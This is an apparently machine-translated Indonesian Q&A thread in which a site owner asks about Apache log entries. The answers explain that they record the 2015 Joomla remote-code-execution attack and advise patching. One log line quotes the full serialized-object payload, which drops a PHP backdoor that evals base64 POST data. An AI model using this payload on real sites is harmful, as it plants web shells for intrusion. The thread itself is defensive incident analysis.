Apakah identifikasi agen pengguna digunakan untuk beberapa teknik serangan scripting?

10

Entri log akses Apache di situs saya biasanya seperti ini:

207.46.13.174 - - [31 / Okt / 2016: 10: 18: 55 +0100] "DAPATKAN / hubungi HTTP / 1.1" 200 256 "-" "Mozilla / 5.0 (kompatibel; bingbot / 2.0; + http: // www .bing.com / bingbot.htm) "0.607 MISS 10.10.36.125:104 0.607

sehingga Anda dapat melihat bidang agen pengguna di sana. Tapi hari ini saya juga menemukan bidang agen pengguna yang digunakan seperti ini:

62.210.162.42 - - [31 / Okt / 2016: 11: 24: 19 +0100] "DAPATKAN / HTTP / 1.1" 200 399 "-" "} __ test | O: 21:" JDatabaseDriverMysqli ": 3: {s: 2 : "fc"; O: 17: "JSimplepieFactory": 0: {} s: 21: "\ 0 \ 0 \ 0disconnectHandlers"; a: 1: {i: 0; a: 2: {i: 0; O: 9: "SimplePie": 5: {s: 8: "sanitize"; O: 20: "JDatabaseDriverMysql": 0: {} s: 8: "feed_url"; s: 242: "file_put_contents ($ _ SERVER [" DOCUMENT_ROOT " ] .chr (47). "sqlconfigbak.php", "| = | \ x3C" .chr (63). "php \ x24mujj = \ x24_POST ['z']; if (\ x24mujj! = '') {\ x24xsser = base64_decode (\ x24_POST ['z0']); @ eval (\ "\\ x24safedg = \ x24xsser; \");} "); JFactory :: getConfig (); exit;"; s: 19: " cache_name_function "; s: 6:" assert "; s: 5:" cache "; b: 1; s: 11:" cache_class "; O: 20:"JDatabaseDriverMysql ": 0: {}} i: 1; s: 4:" init ";}} s: 13:" \ 0 \ 0 \ 0connection "; b: 1;} ~ Ů" 0.304 BYPASS 10.10.36.125:104 0,304

Apakah ini serangan? Entri log berikutnya tampaknya telah berhasil mengambil (kode 200) file yang sqlconfigbak.phpdisebutkan dalam skrip. Meskipun saya tidak dapat menemukan file dalam sistem file:

62.210.162.42 - - [31 / Okt / 2016: 11: 24: 20 +0100] "DAPAT //sqlconfigbak.php HTTP / 1.1" 200 399 "http://www.googlebot.com/bot.html" "Mozilla /5.0 (kompatibel; Googlebot / 2.1; + http: //www.google.com/bot.html) "0.244 BYPASS 10.10.36.125:104 0.244

Tolong apa yang terjadi di sini?

miroxlav
sumber

Jawaban:

11

Ini adalah Serangan 0 Hari Joomla. Informasi ditemukan di sini: https://blog.sucuri.net/2015/12/remote-command-execution-vulnerability-in-joomla.html

Ini bukan tes kerentanan meskipun __test. Itu adalah serangan.

Pastikan bahwa setiap pemasangan Joomla selalu mutakhir.

Pilihan lain adalah cukup menggunakan .htaccess untuk mencegat exploit ini dengan mencari string yang umum, "__test" akan berfungsi, dan mengarahkan ulang ke tempat lain.

closetnoc
sumber
4

Alamat IP yang Anda tautkan tidak menyelesaikan ke nama host Google karena itu bukan Google. Orang atau bot sedang memindai kerentanan situs Anda. Yang pertama berusaha menemukan kerentanan Joomla.

Peristiwa ini sering terjadi di sebagian besar situs web, Anda harus memastikan bahwa Anda mengikuti praktik terbaik dan mengeraskan situs web Anda, prosesnya lama dan Anda harus menemukan dan mengikuti tutorial online.

Simon Hayter
sumber
Oke terima kasih. Saya sudah mengeraskan situs webnya sebelum menemukan ini. Jujur, menemukan vektor serangan seperti itu sedikit mengejutkanku.
miroxlav
2

Selain jawaban lain, perhatikan bahwa fakta bahwa serangan ini tampaknya berhasil menunjukkan Anda menjalankan versi PHP lama yang tidak aman. Perbaikan untuk bug yang dieksploitasi serangan ini dirilis pada bulan September 2015. Jalankan proses pembaruan Anda dan pastikan itu menarik versi PHP terbaru. Dan periksa juga program-program usang lainnya yang menghadap ke Internet, karena tampaknya server Anda belum diperbarui selama setidaknya satu tahun.

Periata Breatta
sumber
Poin bagus!
closetnoc